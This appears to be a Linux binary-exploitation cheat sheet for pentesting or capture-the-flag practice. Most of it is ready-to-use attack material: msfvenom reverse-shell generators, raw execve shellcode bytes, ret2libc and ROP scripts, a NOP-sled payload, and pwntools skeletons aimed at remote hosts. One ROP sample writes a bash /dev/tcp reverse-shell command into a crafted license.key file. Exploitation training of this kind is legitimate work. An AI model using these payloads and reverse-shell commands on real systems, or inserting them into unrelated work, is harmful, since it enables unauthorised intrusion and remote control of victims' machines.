Linux
Very Basic
# -----------| General Purpose Registers (32bit)
EAX # Arithmetic and Logical Instructions
EBX # Base Pointer for Memory Addresses
ECX # Loop, Shift, Rotation Counter
EDX # I/O Port Addressing, Multiplication, Division
ESI # Pointer of data and source in string copy operations (Source Index)
EDI # Pointer of data and destination in string copy operations (Destination Index)
# -----------| Stack (32bit)
ESP # The Stack Pointer (Store pointers)
EBP # The Base Pointer
EIP # The Instruction Pointer (Will tell what execute next!!)
Create shell code
# -----------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
# -----------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"
# -----------| Linux bit 32
SHELL_CODE = "\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80"
# -----------| Linux bit 64
SHELL_CODE = "\x50\x48\x31\xd2\x48\xbb\x2f"
SHELL_CODE += "\x62\x69\x6e\x2f\x2f\x73\x68"
SHELL_CODE += "\x53\x54\x5f\xb0\x3b\x0f\x05"
00. Basic Checks
# -----------| CPU architecture information
lscpu
# -----------| I4-64 System Calls
cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h
# -----------| checksec info
checksec <FileName>
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled <-- we can't drop shell code and jump to it; so use return to lib.c
PIE: No PIE (0x8048000)
# -----------| Disable ASLR (Address Space Layout Randomization)
echo 0 > /proc/sys/kernel/randomize_va_space
# -----------| Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
# -----------| Check offset value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_VALUE>
Get all functions
readelf -s BasicOne | grep FUNC
01. ret2libc (NX enabled)
# -----------| Check ASLR changing ?
for i in {1..20}; do ldd <FileName> | grep libc; done
Return to
libc
** [ ASLR OFF ]**
import struct
# pwndbg + create cyclic + find offset
junk = "A"*52
# ldd <FileName>| grep libc <-- find the libc
libc = 0xb7e19000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x0003ada0)
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matters
exit = struct.pack('<I',libc + 0x000b07c8)
# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x0015ba0b)
payload = junk + system + exit + binsh
print payload
Return to
libc
[ ASLR ON (Bruteforce) ]
from subprocess import call
import struct
# pwndbg + create cyclic + find offset
junk = "A"*112
# ldd <FileName>| grep libc <-- find the libc
libc = 0xb75b8000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x00040310)
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matters
exit = struct.pack('<I',libc + 0x00033290)
# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x00162bac)
buff = junk
buff += system
buff += exit
buff += binsh
for i in range(513):
print "Trying: %s" %i
ret = call(["/programe/file/path", buff])
Return to
libc
[ ASLR ON (if you have access to machine) ]
# -----------| Get running process memory values
cat /proc/<PID>/maps
# -----------| Find Variable Values
## head -1 /proc/<PID>/maps | awk -F\- '{print "0x"$1}'
base = 0x<value>
## grep 'libc' /proc/15922/maps | head -1 | awk -F\- '{print "0x"$1}'
libc_base = 0x<value>
## Download the libc file
## grep 'libc' /proc/15922/maps | head -1 | awk '{print $NF}' | xargs -I {} cp {} libc.so
## objdump -d libc.so | grep system | head -1 | awk '{print $1}'
## remove all 00s and replace it 0x. ( usually it's 0x(last 5 digits)
libc_system = p64(libc_base + 0x<value>)
# -----------| Find Gadgets
## Install ropper
pip install ropper --break-system-packages
## Find RDI
## ropper -f libc.so --search "pop rdi; ret"
pop_rdi = p64(libc_base + 0x<last 5 digits>)
## Find RDX
## ropper -f libc.so --search "pop rdx; ret"
pop_rdx = p64(libc_base + 0x<last 5 digits>)
## Find Mov
## ropper -f libc.so --search "mov [rdi], rdx"
mov = p64(libc_base + 0x<last 5 digits>)
# -----------| Find writeble mem
## readelf -x .data <binary>
writable = base + 0x<last 5 digits>
# -----------| Final sample code
from pwn import *
offset = 520
base = 0x559b1a806000
libc_base = 0x7fbc1b8d9000
libc_system = p64(libc_base + 0x48e50)
pop_rdi = p64(libc_base + 0x26796)
pop_rdx = p64(libc_base + 0xcb1cd)
mov = p64(libc_base + 0x3ace5)
writable = base + 0x4000
cmd = b"bash -c 'bash -i >& /dev/tcp/<IP>/4545 0>&1'"
rop = b"A" * offset
for i in range(0, len(cmd), 8):
rop += pop_rdi
rop += p64(writable + i)
rop += cmd[i:i+8].ljust(8, b"\x00")
rop += mov
rop += pop_rdi
rop += p64(writable)
rop += libc_system
with open('license.key', 'wb') as f:
f.write(rop)
02. NOP sled (NX disabled)
## ------------------| x86 Bit
BUF_SIZE = 362
SHELL_CODE = "\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80"
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf
NOP_SLED = "\x90"*(BUF_SIZE-len(SHELL_CODE))
payload = NOP_SLED + SHELL_CODE + EIP
print payload
03. PWNtool Skeletons
ret2libc
(32 bit)
#!/usr/bin/python3
from pwn import *
context(terminal=['tmux','new-window'])
#context(os='linux', arch='i386')
# If programe in local mode
#programe = gdb.debug('./myapp','b main')
# IF programe to remote mode
programe = remote('10.10.10.61',32812)
junk = ("A" * 212).encode()
# run gdb one then CTRL+C to brackground then type p system
system = p32(0xf7e4c060)
# type p exit on gdb
exit = p32(0xf7e3faf0)
# type find &system,+9999999,"sh" on gdb
# select one and then type x/s 0xf7f6ddd5
binsh = p32(0xf7e3faf0)
#programe.recvuntil('What do you want me to echo back?')
programe.recvuntil('Enter Bridge Access Code:')
programe.sendline("Something")
programe.sendline(junk + system + exit + binsh)
programe.interactive()
from pwn import *
#context(terminal=['tmux','new-window'])
context(os='linux', arch='amd64')
# Load programe in local mode
programe = gdb.debug('./myapp','b main')
# Load programe to remote mode
programe = remote('10.10.10.147',1337)
junk = ("A" * 112).encode()
bin_sh = "/bin/sh\x00".encode()
system = p64(0x40116e)
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152)
#programe.recvuntil('What do you want me to echo back?')
programe.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
programe.interactive()
04. GDB
GDB
# -----------| Find offset
#### Get the random chars
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
#### Run the application via gdb
gdb <app_name>
r <random_chars>
#### get the below value
## Program received signal SIGSEGV, Segmentation fault.
## <get_this_value> in ?? ()
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <value_from_above>
# -----------| Find EIP
#### Run the application using gdb
gdb <app_name>
r $(python -c 'print "A"*400')
x/100x $esp
x/100x $esp - 400
#### Check where the '0x41414141' value is begen.
#### Re write as follow
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf
GDB-gef
# -----------| load programe
gdb-gef ./myapp
# -----------| Run programe
run
r
# -----------| Create pattern
pattern create 200
# -----------| Search RSP or EIP
x/xg $rsp
pattern offset <RSP Value>
### or
pattern search $rsp
pattern search $eip
pattern search qaaa
pattern search 0x00007fffffffe288
# -----------| Show registers
registers
GDB-Peda
# -----------| load programe
gdb-peda ./myapp
# -----------| Run programe
run
r
# -----------| Get memory address on system (!! run programe before get this)
p system
# -----------| Get memory address on bin/sh; get the value on libc : (!! run programe before get this)
searchmem /bin/sh
# -----------| Get memory address on exit
p exit
05. OBJDump
objdump -D myapp | grep system
Last updated